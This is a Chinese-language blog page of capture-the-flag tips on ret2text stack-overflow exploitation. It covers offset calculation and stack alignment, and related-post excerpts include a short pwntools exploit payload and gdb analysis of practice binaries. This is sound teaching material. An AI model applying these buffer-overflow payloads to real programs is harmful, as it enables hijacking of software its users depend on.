ret2text小tips
exp模板
1 | from pwn import * |
264即258+8,258是rbp的位置,ida里一般是16位,0x401202为后门函数入栈的地址
注意:1.一定不要忘记加4/8个字节覆盖栈底寄存器 2.在64位程序中,如果不成功,可能是栈没有对齐,需要把后门函数的地址往后加两个单位
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 JiuTian's blog!
相关推荐
2025-10-27
用gdb的动态视角看ret2text的实现
来看一道非常简单的栈溢出 后门函数地址ida里很明显,0x8048521 exp本身不难写,下面看一下怎么用gdb确定偏移 1234567from pwn import*io=process("./pwn")#io=remote("pwn.challenge.ctf.show",28175);gdb.attach(io,"b main") #在main函数下断点payload=b"A"*(0x12+0x4)+p32(0x8048521)io.sendline(payload)io.interactive() 0xffffcfd8 是当前函数的栈底,指向的0xffffcfe8是上一个函数的栈底(old_ebp) 用0xffffcfd8减去0xffffcfc6得到0x12,这也就对上了ida里的偏移量 我们退出,输入fini直接运行完,可以看出已经覆盖了0x12+0x4个字节,并且我们的后门函数地址已经成功覆盖到了ebp下的返回地址
2025-11-25
初识gdb的使用与数组越界
开始做ISCTF的真题 girlfriend 题目难度:简单题目描述:你能记住你女朋友的生日嘛? 首先先点评一下,出题人出这个题缝合了两个关卡,把栈溢出,ret2text和数组越界全都考察了一遍,我认为出的水平非常高,符合新生赛要求 当然这么简单的一个题我居然想了一天,也确实是见识少了 123456789101112131415161718int __cdecl main(int argc, const char **argv, const char **envp){ char buf[40]; // [rsp+0h] [rbp-30h] BYREF char s1[8]; // [rsp+28h] [rbp-8h] BYREF init(argc, argv, envp); puts("welcome to isctf2024"); puts("first i need your team id"); read(0, buf, 0x30uLL); if ( strcmp(s1, "admin"...
